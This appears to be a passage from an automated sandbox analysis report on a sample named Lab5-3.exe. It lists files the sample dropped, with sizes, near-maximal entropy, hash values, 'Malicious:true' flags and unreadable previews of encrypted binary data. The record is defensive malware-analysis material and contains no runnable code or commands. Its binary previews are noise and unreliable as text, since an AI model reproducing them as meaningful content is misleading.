                                                                                                          Preview:....Z.PKZ[OE\c.....&..U.4.o.K...d.....E..b..]...S.1..C...}-...f=...t.4O"....P...!..9.]1....r.."..h.=...z45|.r-..^.7...().EF&y...w...x.8~VX..6.d{.>....>8G.6.!..iQm..?0W;.2@..1.Y....1...u.....,T. };.n....!..+..0C.o..&...d....xLi......D.....0.D./.q..f3VK..&.u....Y.C.P.|h..g..GI....bm6>..T..9.1e...m.*K.`....0.._G&..[.Y.....{.D.@...u....j`}.jaL..E........=..X.$.k..~0qu!X...La..L....r.?...?^.c|....Y.H.N...p..Ik..'.S.i..kiR..@.."....DY/..+g+.>....... .4....2.t.QdS.xq.6..e..P.P..KfPb.mv.g...q.q.6........t.k_H..lw.Z.t...p....+,7{.!.....IxP~...l.S..y6.;|.E....$...../O@IH...}.....[..%.8."W..^......R.P.x.a&....`....Ol:..b..{B.6.y.V...x`.f".G...Z..m.D..f.Q.[;..d.B.u......{.n:t..\M..e.r..%P..uI.6[.J..m......)..../=....5..V..-..v....U.|.+..m.......k{.........d:..%....k^IF K....d:&[../.0.a.j.F0..Y.Db%!?.e.......b.......@(.l......g.>...b.9.....MhU...c9..GV..~.-.....T..Jf).....'.L.S.^fU.C{r.#_..p;.!.@.B.M......S.Uo@B'k-.<"^^.o.j8d|J.0b|.*.k{...:iS..j....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):91184
                                                                                                          Entropy (8bit):7.99764047873114
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:Wz7bbzGi9WFnpdsGucKq35xlPiIUefM+lMPl2+zCxuG9EZXjhXsDGlscvVoPdvhs:Wz7fzGiALGGucKGPvZMPA+/GQXqGl7oU
                                                                                                          MD5:570460358E3312B6999377EA19902F56
                                                                                                          SHA1:18E9DB5034BC7E1C00474EB5BEE4E37AA138E067
                                                                                                          SHA-256:E817DFF25FFF7869DEA6926F15C09BE32A39AD07E672F8D31EC5220292D0E06A
                                                                                                          SHA-512:D4CAED74B3D809019E955C8E23E9128FC0DE7AF3D9A8E2FA37CA20A96B6B27D42EE212CBB5844929654C9868BE6D5FE430C407E24C6E96B87C6C59273B3AF782
                                                                                                          Malicious:true
                                                                                                          Preview:..=2...9.....].%....N...J.).S..#.K..`.P..._...X$Sw.j.U._.S.on.c....Ze?d..g.!ADr...3..+.h.n..^..w3.^.6Q,...,m.....l...v...5..4..o. r.xe\.....m1....... @..B.~..<.B....L.....j...\..x>;.v..F.<.\le.:K..5..F6..P_e)./.;....ze..is.......k.).%.8.G.J..Ba......x[e....\Z...@.`..."..H@i..D.....6).O...+.].+.o....Y...4T.N$.b..xf.k.w.9Pj...G*+A....|\\.|..V#.q..1..6K..l...#Ww..<>...G.(....3..6__l.5....1....I.S.k.P.../.-0G.......%........S.8...cTyBd...,..\...U.@..FNtc......K*Ev.+b`.).J..J.|....4.l....U....../..\GV!....m}..'.'.6.......QP<;..2..S.8.Y......,=@y$[.k..V......n......>..<<"...<.....vl....~T.X|!.T5..y...wW.....p.....K&..\V.....`.%Z.............;*.)5.qM......Fz.LW.rr-P.b....aa...`.#*.l.._?0.\...#T.*.F(*OR..Dp.A'k......$...O.Rz.*H..>.....ya....u.. ..[.E^J....]:.U:...~h.....=........[.~.2..*.......O.6~.vf...jDU8......4.........C.;(}O..y...1$.3;i......%[...E.......r....".K.L/.}...7. ..@..tP..1:(.Pu..?.bS......:X^...&...h..G.........L{%..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):90336
                                                                                                          Entropy (8bit):7.997764875165862
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:X4Qw2rrZnew2ouDV7BzuEqPmHYJat/3tUzIL2HWoDPnvhzfl5FWhYidB2oJYay6M:n1JMjqEqPmHYJa9tnLGWozVfnohYAB2h
                                                                                                          MD5:B466A5FFF56EFCB7B8BFBAD04DD6495C
                                                                                                          SHA1:6EAD7A7A647427C69BFD41A81D1F1DAB5A1AB1FB
                                                                                                          SHA-256:9373F120BE372B89F6B71B56A9E259B8E5FE94698594FCD29BAD53B8C3927F9C
                                                                                                          SHA-512:956C7400FB2B18069ADBC1C6A6B38AAE8A918699DAD066B996BD84B8D8CADCF985E0C63AB1D76E4755D07E2426823CACE329532130F56081A13DACF57D1FAEC1
                                                                                                          Malicious:true
                                                                                                          Preview:..1.R..}..[....#....a.....Uh.i..e.ig.R9U...-..MK...h.m..A....=m0.X{.|8..?K..T.....Q..._#.o.......W...."+.......{.q..y}=..E.9|+..W...O.g.E...`..... .......G.|!..l........W{2.i..n.....).:!...;.M3.Z.....d......_I..45.8+>..?8...u..]@.......9;.{..b@."........=..sh|..=@...{....A.5..<>&.{.."...>.....t....3.!. .HX.I5..f}2......A+....J...d...p9C.!.2Q.#.Y..s7.iM..........2E......G..8.{...<;t.LQ. #.O.0.1.=.....h.<.8......?.f..S. ....v%h......P\.?`.s-....k.e.w....a...\..0........ZZ.<e...&..}9..*|...I..M..w.:.ClI$....K6..._I.x...J.~!..,b..M.R..`...F.w....(*.p.851.?..!I.<.T..?....D.....,..k.B1B..q_..{.-.khj.ch.-.<.&.... .....[....>/.1Y........&.p..P..J...J}mG..D..#.......LY.-p.=...m{T.....X..dX.B. k........j.(...r.q...1k....A..-...K..\^...vO..J..`f1.......^.YP....`..\.....[^."\B.Z.h..we.?!O..K....%.z..... ...+^.{.'.Z.;.B..=.g..."T....$.U.....-..`............e!....%.....q..?Q..kB...D/]..T...>.Az....../l...c.c.w.z....[...^D..W........\".xi:..`.@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):83728
                                                                                                          Entropy (8bit):7.998169607459139
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:75yf1lqfgev5HZvoTEymJyBI+mwXdzC6mq1rNGgygf3BtHmTETkCe92Z:lgGXvtZvYmSmwzD1AnOx56rkZ
                                                                                                          MD5:54AB9504140E947881B1A6022B7FB25F
                                                                                                          SHA1:41412B9CCB8D56E8B10859CE59F20A9EE6B3EEEC
                                                                                                          SHA-256:D17F72E5A56F55BF19A361F3837CD52AB27D92A27C790171E8BD64166E0C3DD0
                                                                                                          SHA-512:5435933E4403F37BFCBC87B94D1BAD9DE99CF66817D01E222E9A5B9A6783188564975353F87FF480E7DACB715EA7A6D7F8987AC2829C9DCE8FB1620D4589B7C2
                                                                                                          Malicious:true
                                                                                                          Preview:(.!...Wh....9.r.j.......xF.......(......qu....E..y....A.y..4......o.f..........9...v0....OU.%......t.Q.9.:..m.":Sw..?.8..rv.=.m..^.'.@....gY.HDyZ.Px...V.W^E...h...U.D...)i.0....n...0..O....\j..m(D.T&.k.-^.g\.8e=..pe...&...I..c....a+.}F.\.).s..).0..]..Y.......99..cwfwN|...c......"u.2t..v...W..B.....g*.}.x:y.......7....ot.....A..W.a.K.L.^S....K;..K/..^'.jV...../&.lGB.y...:...".3!._=..`o.]8..iT.USj..c.l..q..m.ZtV...e..*M)..9.'F!...f.......N........5...W.4..D.x4.9....-...zP....7(.. B.O|..9...#.F...Uj.b....=.r.8.E......r...pt..r..?.%l"..........>.O.8..e..'/@.!z.5..ho....(sg...........F&.N..,.+...%..v.}7j~..j.......7!......|'I!@...u..5........l..H...7<f..r..l@+..X......^.%.h.......(Ug...@>B./.i...c.`0.[g...J..s.Y.r_..S1.4X....KCS...43(..+......z.5.b.Q.BM....m.m.....e'%M.s.._N.G@.....X*...>..M.....1Sj5..(.y.._._.J....<1m..M....G9.uEB.......D..n.....2.6..=.../[........D..M.....p}1$JP.....".}+|..z.M..LxD_...5F...d....f.t9+ckZ.T.S6dE.P.5$.q......b(P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):92560
                                                                                                          Entropy (8bit):7.997832532498796
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:fIPJ5Kq0lPyzsull0ZM2HyUAf3UPnAlmBJ467o9Ars19jwqbhAX0AJb2YO/TI/Z:QPfmoAMRtfUYoBJ41+rw9jNK/aYO/CZ
                                                                                                          MD5:CF51502E7FD62C5A99FABF18AE7CF700
                                                                                                          SHA1:577E14CCC8B516C05962544CAE5B2EC1CC5B1184
                                                                                                          SHA-256:AD51A387A9FA43A9C2DA08EB9441724D90F6B00ADCCD45FED822AE4B4F913B07
                                                                                                          SHA-512:92FDDE98452E1BCA5BE79F5AAC7AC8F92013F0ADBC61025E7CA65F052AB2EFF84B6E3633AB375858A0E60AA69C7205D623D3D94D72F4EE28875BE4C3E49E229B
                                                                                                          Malicious:true
                                                                                                          Preview:.l......7v..AY..9..".?'4.4f.g....;..}.P}.qb...}..E#Kg....Z^P.=h}*...qtI.?.94.X!.a..%@...%...L..4.M9v?...Ju.:V.....K.|I..Zr.....=.)h..6..........P.M.....d.2.#.D.M..k.f]%*.....=1.Z.x..@.'.M....7...~.\.Y..%..~.!.......d.l._..VX<.Q.Q.D...o.<`.G.FD.T..(...\Z...,.1....t.S6...rd...z..T_...........zf..`...tS....f:..=.>5Y..C.h0...s.$.WEd._........kX!.&.2.^...e......<Zu&...u..p.n.H.R.).fS.Pg.u.....G.b.?t....H4Z3..i.e...R.qIX.'2..s.e<..._.n.:k...).*......t..d.X`...k.."H..m4...'....'...\..,...d.P..P....+.r.^..(...G......yw<X....+.%v..{.x.J.m..f3..B...E.y{.....Z.G..|...(...o2R.0k`(.>W.w..D..S.....pm.....H....O&....@.........6.>%."s.&A.......;-..Cy>..[.v...hH..H?....h..RO..X%.S...-.eS.7_[e...;...@.Z4..0... ....b.s|4..UC..P....tA..T0.}.x."..qq..........J+W.5Z.{Q...g=..}.N..^....B.M..em.v.hY...,v....IN..'TqO.Y.z~...7[].S.%..@:.....<aw....T.........N...OH.#LQ&..z.,|......K,.-X....I!.<Q...(.]....%q..W'{dc..?....(......{>-.s....ekf$... s5...$l$`.....u.U+.$.#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):77152
                                                                                                          Entropy (8bit):7.997680994090078
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:2EqbU/kCQ47JUAOOmalc/3wisJdAzxYQwziMbEkhbegzXmxlOWH1f/2fvrNU9d6Z:2fbU/kKlBOO9lk3wDMxdlMgOlIlXAfB1
                                                                                                          MD5:0052F49DE2D7679F2B559E22176ACCBF
                                                                                                          SHA1:E70789CA656D405916845B4A4B38B9A8A41E0D92
                                                                                                          SHA-256:AB20DAEE7D7542568E34599B8B371D3D82FCE632792F0A3D0C59AD3F99FAB28D
                                                                                                          SHA-512:6739444227127FF682D98824E7A6DE75D3E882CB4667828A2920745E75624CF0087C3E75E9D9FF52CA6FDFE7394AE5156B4492786E948CB9DB083B34DA2A9DA8
                                                                                                          Malicious:true
                                                                                                          Preview:....~..G..r....K...Z.o.Zn1V..).N.5n...ZXB....7>M.F6.V.V.eA......r0....d._`...2..<..-..5....g....qC....y.6-P....ts.Y.e.y....mW.s..g...!..."..[v...#...k#..i!..~.....m.S...1... @.__....6M{a1.n+..3./.p.'W..XS....@.zp..1..s..rv..z.k.;x......yr..U}.R#..#IlX1Tjt\V..l.@]..G..Z*.....uX}....J..H....[.E...s.U.7.M._`(...~.rks..w..y....kS.s..O..;..1....5...........&.Ik...U....h..l....6|.C.F.a2..R.....1^~4U.`!..|[g.yE.l.....L.1...n...?r...*<8.A..K...|....%&L4...-Q..&.._..I...*.$.+.3}.x..'...y....?.cU.......7g.'....$K.....6.3.p_....S^..W=K.4.......RWe.}E..<.....>..>.......xdR...$A`.LP...nx@.S.....9.h.*'..*.....2.S.X..7.....RP-G./.0L.....prx&..8. ..B.,Dvj.>..a.-$..........(zaGg.y..9'..l.0`.h`^<.#p.$..+........J..J.....Wg...).....h..dM....'.8-.pJKKjb.>.$5..<6..`....G..8......a_..TVM..s..&.0Gn..=1V.G.o.P....R..V.[v.....0_.."....#y`..4$.8Agg.*P\..ca..WL*`?g.0...`.+.80#+..2t3....7F..-|.t....d6RkG..u..Tt.@.g..Yq%E..gs..t.....>,.......z.........<...~\.0....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):77152
                                                                                                          Entropy (8bit):7.9975945245078846
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:8gnVYeXq+yAei3ah8bH9EQygMq+P1mr8Lti3NCZ:BpyAeWhKPrqaCfkZ
                                                                                                          MD5:7584074BC2BAC461FBE9AFA2DA42C8F4
                                                                                                          SHA1:DAA21A710B69635D250B9D4D813CB9EC5803EA3A
                                                                                                          SHA-256:89612C64F25EAEBDCF58543F7D9D89AD4F165BD33D4A6C572DD1E4030A177A58
                                                                                                          SHA-512:AFB0FB7FD9B0681CB5A6D4D1B5C1C12C345E25E29EC3AF925975A946F1867A18C31CC7584ABE2C511AB46991B2DCA7DAFA2FEE0499695A1D165681E12B191BEA
                                                                                                          Malicious:true
                                                                                                          Preview:o.......JZ....",...+.<.N..VmM.}...Cl../8.n.R.@..f31..r.G.hI....8B...u/.s,4U..<.....!I.{.. .......z.j.p...))..\.2U.'F...p.%G=$..|.2...r..........@}.6..6p0...a.....c.....Y6UKA...B..B.w..M.O..S......DL._...f.?9FC.^.p.s..CO....x|A7ns...&.>.?...N.jS....D..2........g..\!."...-....mg.V..=3....}h.?p,pO. &1../.^&.....;...EQwr.../'`.:xS.....}.F.5.....3C...l:.Jk..\|QH^.6{..E.<Py419.Q.mH..v....[..t....TI.B<...Ha]....z.h..p.0.W........;.$0.u...XTl...@`..,...}?--.........A#.(.}..3a/.t..$...z....P.>..J..u...K?. ?AY>OWm.rD.."....._...Af...F%.. y....BF./..-#.*.qn.>.... o.....GG..?..x.u.B..........f.m..k../7r.(..#Tr]#.D|.-L..c"......8pd.)..)y..}$l_..X[.....Q...9.p5.P...W.....4.PG .2.g].,X.......;D&6.d.'.W......'..).}UC.m,.:k..4....V..Z.).~.viP>...z.@x.5.U.$.{.:.Sb....gz......j&.....6[.#.f...........kV....$...fTL...]..%.e..b.2q.mk.D.......0..7m...X...`d.-....)...Fv.Q....[...K)....t..'T%....=...g.g.....z...,.20n....5&.]P.v.([.o..].........Y....(.#....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):91072
                                                                                                          Entropy (8bit):7.9980233805423655
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:C5xw7UwsBCN8xIIYGoToLE2707/1/pjyOOTpLqXQ020ZrnybcWbZ:uwoZcSBY5TkgLjql+59Fyb/bZ
                                                                                                          MD5:5CDFF78033C6AE2CFB6E0512B13D632C
                                                                                                          SHA1:3391105D56A6C81BF0212A15B36D7E0736E8E9D9
                                                                                                          SHA-256:DFA4D76DCC06D74CC0FF97CE03D9573329D440B862D7D934B9F8C8751DA61A4D
                                                                                                          SHA-512:F567B3AB0BCCBBA795ACE877438E7DE0A2303137B5A2566A3363EA43B053AAE478E6348D3D90FB14F43F2EC7B6F7996281103E7F616796C7318D28B256E5F82E
                                                                                                          Malicious:true
                                                                                                          Preview:^.......?W.D.H.c|........`...M...Ga.BP....Ebs....f.G0.S&..W"q<........./.xn....5..T..j.P..iA...D...3...%.Y.E.9VH...U.0.v.-.(c....##.H.`....... ..G.U.W.d..T.....'x>-7...)Ep.qw..:W.8....T..wv....rG.vv.YQ....3/C;.2.\roo.&.$.D...T.....\....F.........X..2...v.......I...R..L>.j_.q......~1...*..A_.X\..R.?..Ow4m.l.zb..v1.P'./.C.c.>...c.....N.o..m&f..+...._.4n9.<.......X{*...b....@.....hl$.....%.'....m...Ux..=..A/....'....M......8.Q.z.....t.)X.8........~....$4.$.n.L..H~d.\....#T......+..GU.S.Ena.V+....6-...J..H.L#a.X.9.7Q5nB......Jfb..~.4.@.'...|..b*..(....L...<a......+oYP.|.....<@u|}..n.j:. ..y.._...<.:...f8g.r.JH.o{'~.T.d.e-.'...z.Uc..HR..E...,/.....A@(;.!aj..H.X.....'...m.........R..yGa..ZJ.......?.(.X..g..\,..n...7iq....u.N.w?}.E..*]..??.Qw.....4...0....oU.....q.......s..^/.O!. f'.q.V.LR...[T.g.".y..w.w.....*`.].nD}g'....Q$-S..e..I....7V..iI(.. .:.......8.G.&Z.........C.h1u6y.F..o.F%@.a...I....h.... .;...%...t.?Er...cuT.I....Z...Z.....z..=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):87952
                                                                                                          Entropy (8bit):7.997716914900233
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:kQKisHYGKDUXesxLWXjwDVrKrfu2/5s5m81UY3GJkCAgKmdJ11bpy9428U3lxUbs:kYYUDUXXxiXjwZ2mQ5s5xAJkmHx1y3vX
                                                                                                          MD5:34625779BF7DB10D058C0DF769465C17
                                                                                                          SHA1:C4A586FCC072CF20BC51AD7AA6C201FC70AA9148
                                                                                                          SHA-256:4D6F19874DA552693EC779850FB50A7B678989E92277B94103BEFB1D1134884B
                                                                                                          SHA-512:70F5058413BC70E326E860635FB5A2E17751BC13576B518EC881D8F34B28EBBD1B20C5A5A0A72BA4ACD24C64D7BA3ECA515DAE5DEF3D4734F78595AE87506755
                                                                                                          Malicious:true
                                                                                                          Preview:.8.t.M.-..q............)...q.0...#.i....Dsf.:.S...+^7k...P.....4*J.'..9Ro........6*.=q..t#.M].....}~..kd..X.......9O,n..EU..(...Z......1...y...r.V.....I)eQ..#m....I.........#...1D:.'..!.........l.6.A..Ft..V..96.S.{K.....(OSwj.....6.S.......:6#~8...).#:.....T..R..p.....4..R......M.....;.lMY.....O.V.X..L...E.r...Va..15...>wf.YK....].......|.J2ed....~.?...... .C.+ta..r...Ng8.PC..H..A....k..>..b..`.z..8O....Fa.?...f:.t*$B...Rg?...^..Q.<..;@.....FHD.o..<.U..[.O....X.].X..$.Q.9UY.):.{.t............)`@KT..T.k."..A[&..\..Y.#|a.....}.).*...5..........4.f3...+...-.....J..zc..v.G@&.......\.R.G..I.i._..........3.v...u..SG.kb..@.%..S{\.......=.4..V..........c..0..._..b.....h..h.....)..."..H.i...\ ..4....~..7.....N....5Y..Pt..&x.xm......X......^.:.s..wp..faj.^.DR.S.U.x7*....n.9....;..-T/.z.m.k.....* .I...<.n.....E...H-.{.`&.".Ds.dv..I.`.o.......}.`a.S...vW.N....,.C.....>.J..g...j...f!......o.<\.78_#.E.l..6..v.b..VD..#o..|.n.......-=.D.........|.+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):89056
                                                                                                          Entropy (8bit):7.99812147389593
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:zp9wyJ2BWh33G8ViThUSp9ckMc9THE+AcClKPpAQqzADdPLX21P89GKZ9eKDMDG7:vwEjhUhUccxc9HqTGp4zAxPLqPsGKZBh
                                                                                                          MD5:16E8E2DF7C0D11FE3CA01AB3845F292A
                                                                                                          SHA1:66074FE90CF6678331831E73EEA5659068C502D7
                                                                                                          SHA-256:4EB929924628619480911AA43A4FF683FD25F78B874161782DBAD7C925A086C3
                                                                                                          SHA-512:DA4D3AB2BE50232597D27FB0A9269C324343BC5FC13F97307CBFA7864990617935575DB41EF55435101E4352D3B5F6F4C547930CBC2E2CBEC7FC8C0E13105CFB
                                                                                                          Malicious:true
                                                                                                          Preview:...bR}c0.%K..2.P...D..l..+O.7...-.=DC-.2..l=x2^.....D.R.xm.....|..l;o.....m.../..g"c.~.L.......s1|...d...#`.X...-.....l........G..k. WN....f.#....t..1/.O...<4...v\...W.....e..T3......LFO.. ,.....p....Q..S.9.kj.Vh`R=~.F.....gu...Xu...B.z..#.n....AH^.g.......#.....E..tW-......U..q.N.B...2.6.f..-...].^...o.DC..K@M.Xk...T.ZFb..."H./.Z..SSmL9......tzP_.@..N..bNV$pc4....5..6..&7...(....`;<`e=.~k`7t.....s.\.8...jk"..cVTq.Y*.w...`.L.R.<M7.l....HH...z0g.Sj%'#...H/.....D.....Njx2D..,....b.Z...iG...U.g-(0..nxNE..*X.R.%.).L./d5.we....S...y._A"y..... .o....2.|......8..)...&..E .....3..x...#....m...dN.n...h..<...-..u...P.`.E.T.@.0=...W.T.)V.-.z*z.P0....h.17gu;4..."..8.....a....:....B...^..D...[l..K...O..A..@Z.r!.....G.C2.OU.Um..K._5...s..W..6. .^...p.X....h.73+.^..j..2.TQ9>..O..+}.p.\......'.#...>V.*G0.s.w..+8xSr.='......@.+.K.........~.>+V=.7.6.Q .^.U3.\..n..F...|..I....;a.}yU..@.y.nw.......uQ....^..]9..Kz.E.....;....;..Nm.......j..O.........p|....Dx..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):93232
                                                                                                          Entropy (8bit):7.998183873930702
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:/Ds6QBOLdd2GCRzl+hJhoijxPd5FFNSJVRoaXxcUllm5edbntWBAPosySVhYwZ:/DI8ef+hJf9dbFNSJkkcjAPosVrZ
                                                                                                          MD5:05C4C24C785D98B7550E62E71DE051E1
                                                                                                          SHA1:AC7BC73F8B039BEB0CCADA4EB6938E2FB0383631
                                                                                                          SHA-256:B011880CDEDA8AD40D9C5F6B9C10D0776461F2C2FD1F17B7EDC841A01446A831
                                                                                                          SHA-512:AEAC13BED6A8B88C283C5953B2EA4A44D25E7130AA1007502B0382214CEEB9D0AB78C6225DD84061AA9EE4E2A14777F58C5781F72DCE13C888C9DEA36F962E69
                                                                                                          Malicious:true
                                                                                                          Preview:....Z..zOKYW0Tv.lCAg.<.....1.QoU...-..@.'.z.2.+."..X....5....".op.T16..0u....\....R.F.......(;%!..`.Z.g.G(^.(..'.O.^.......rfg.=.J1...`.._.AS;.MZ...x..B....B=.N....!s6T6..*D..D...]$".T`..T..0]...@....3..9....3...j.rT.-k..u.XQ.G..50Gu.M......t..V~) ,.x...Pp..y....@gm.X..M[..P........2..[..k.w.0.\..........^.3......Br2:....u38.`..t.y#........B.]Z3.F%.<..z...s...^..F..Ml<...C'...f..l....!.n.L/..;.._..U.,... ..p..../.y.3BI:LaSP...Ao.J..{...7........_.JBgO.P.kO...[.<..i.d_.|b.\r..=.p.{........a.."Gbo.D.(....`r?.).#...&{4..aA.c...../..3GG....`.ZG.D.LX.Lj....8.C.l.W...*@:.w. .Cg.?%Pz.c..V.@P.M)x./.b....k...C.G!..\..p3..<..X|.............+......q..<....y......._d..G]f0...Lf..@....jD%.......>Wj......:.9.J.%....z..B.l......O..`7K"-up....^.*...H!.j..jsrO.p...G.[.30...1.....cw....5...y.0.pn$xla........).}J9.\...YL.K6.E.J..x@..j.Rs;.20.....BG.GR...&....X.=.\>x....]...UI"tZg.y.B1.zp.f.1..my.?Ho....l..o...hG.&..p.P.Lf...6.J...^Pn..\......b<?p".@..\....6..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):92896
                                                                                                          Entropy (8bit):7.997880865598106
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:02RpOr5JvcIrMaN4W7dRKCb9Z+I6OGxiCLNP/KgBlAZ:0rtWq/zKS97rhSNP/Kg7AZ
                                                                                                          MD5:6949C782E85C737CEA51AC2C7C9D7476
                                                                                                          SHA1:A6B66D4F3F9CDB98F72319F2F328E0EB37F89EF2
                                                                                                          SHA-256:9B87E03833B6162C90C14B408880B0DE8D849755BA86B16B7F35F78D8F9EE955
                                                                                                          SHA-512:1E193E5B41F3A68DC0EA1D7DC96C6A7200BC8F1AE74AAECB268B3006153FD48720C7EE3A1C59E1C265C221F31C5927431CB68A40BBF6D37BFD6995F2CD090A42
                                                                                                          Malicious:true
                                                                                                          Preview:..6.....f.*.**.Y..HOq..,...s^.r.%S..%1?.[......|..x{)...L...E.2`...>.p..Z8R.l.\...Z..3.q!i0.bn..]=....%...2.U..G......A..wf"...e.C..X)j8~ej.J.9..k...+~Lx...J...Fw.[mb...f..t....jOwk2.RP.{.\FK.u...7.G..$tn.........&.&-wz.......@..m.X....=..{.M.....&,.d..Rp0;...<.0.......E.p$.....w.....G.......2.f\)....9)<..E....%og..d+I....6.*X.=G..7..../e...R..G".n....._...H..B.bU.....{.....E.rd.....TO.#..T...,X...,......=.$.^9...y.b....c....k ...bO8.O..i....T...c/?..cQ.}...h.' Rg....=L;.._..k..=.G.,...........=.h.V....M.['J.;..F..........S..zsqA.>^..}F.:.:..2.."h..u9t.......U?.:wY....G..ENv.]..V...K.o|m<...:....[.....e......9.^LO....I..%.$|..^73...@.J....F.("..1}.`....)...K.eI. ..1......P..2.2............?DH.1.'N U.....t..@."..cL..c0......-.............d......|..$<n.G.S.*..2$...r..o..}u.S.5;..1.HR........I..]S..T4..U$.'D3m.E..tP.w...q..O..%...T~x5.d.k.T...cl....t p..J0>.K.U?..9.u+..^#....s..%....8=Kv...QD.>....'J3...HA#....~.........VE...+`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):86976
                                                                                                          Entropy (8bit):7.998230197734929
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:sDmM+oWv3eeyi05wLSFB2pAduaZo8tAnGT5lYc3X03+F1mdOggnNy/DgZ:sDmPeeyiZW2bwl9n03+F1mE9QUZ
                                                                                                          MD5:48DE47E1F64079E0E1981E32E7DB9569
                                                                                                          SHA1:A2BD813ABBD976F3141BC80F479F551BA43EEAF6
                                                                                                          SHA-256:30BC9C503ACBA35A61E17C310E27A760934F05677BC5EA131C896BF441DEF777
                                                                                                          SHA-512:E11709A95D88ABD7080F4186629264270875C412CC7070B0BB6DACEAD6D6A942AB92DD4879D3D5D082C24FD605F4DCAE25B54C290CC1BA460C651D26B6463887
                                                                                                          Malicious:true
                                                                                                          Preview:.F.....j.B.... Q.....a....]ST..b._.@>.-.rhA:......E..A..i.....hg.dJ...J......M.,r........Fy...5.P8..@.0x..l..d...AdRt.hEG..H.b..;..T..I;...B.1.R@. .&....y..8..C.......v.Z......8.KG.x...v....Q!....&.K.Y..-./T......8..&.ki..<........p^Y...&y.....z...&.....]......_.....2Y..?K.:G.<.k..'...n.....o.t.uz.Z..n.Q5$..D...`##.4>..U....^t......q.....*.XL.~.f}.n......HW..g.o..B>c.s.1.)q.m`.Z..a6..I.U....z.a@..%.G...0.b.oU:..\...eN...l...!..[.\h.......s{.Y.e..oG..Q.-d=...LiV........y..k$.....yP\q....nW.b...y...1R..}......|H.,.......2|^..86*."..fC.X...F......w.1x...>8TB..?..eq..{..n.JT4.3....2..2..sz.....#...*K...,....L.........u+..uV'...W.X....a..D....o;..4....ff.|...Y..(.r=...5a...L.S1#.....].k.bDFo......l.uX..,...y.0..8?.;c....L_....L% *...'....yT....JC.......^..PL.s*.>..^.H$...^.t......'.....~>?4.o...+........c.H.K.d....../..0....K.....@m/u..Y.^.U......._.E.....c.E.q..g.u...%d$e>.v.!...i.(.'..$.....Nu...8.iO%vb..J.Z@2...B2..?y.w..EQ..b..[....X.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):93904
                                                                                                          Entropy (8bit):7.998294704904098
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:S+hqrICcSYgcNlIpG+kcvZc1CmVsblaz+Z5F5HKmTLyOxizXTjbC3RZ7oZ:SrSsolIp5kcS1uTRwXawZ
                                                                                                          MD5:722B5013486EB198BC8104739BA60F16
                                                                                                          SHA1:5EB15F6E1C1691FCFF49217CBBE3E6C9B623AFB6
                                                                                                          SHA-256:0044A10387875DCB975D4AE5B03BA2C633A4A67C6A3F4AB4541F78C236539FA2
                                                                                                          SHA-512:AC103127B8A732F6B85142985B5383ED58F6E56DBCC35AD27AA1670D685A5F138E8D2C806C28217075D3D2CA3621108BBDDC0F12B762A0CEBDC0EAE19EA20D1B
                                                                                                          Malicious:true
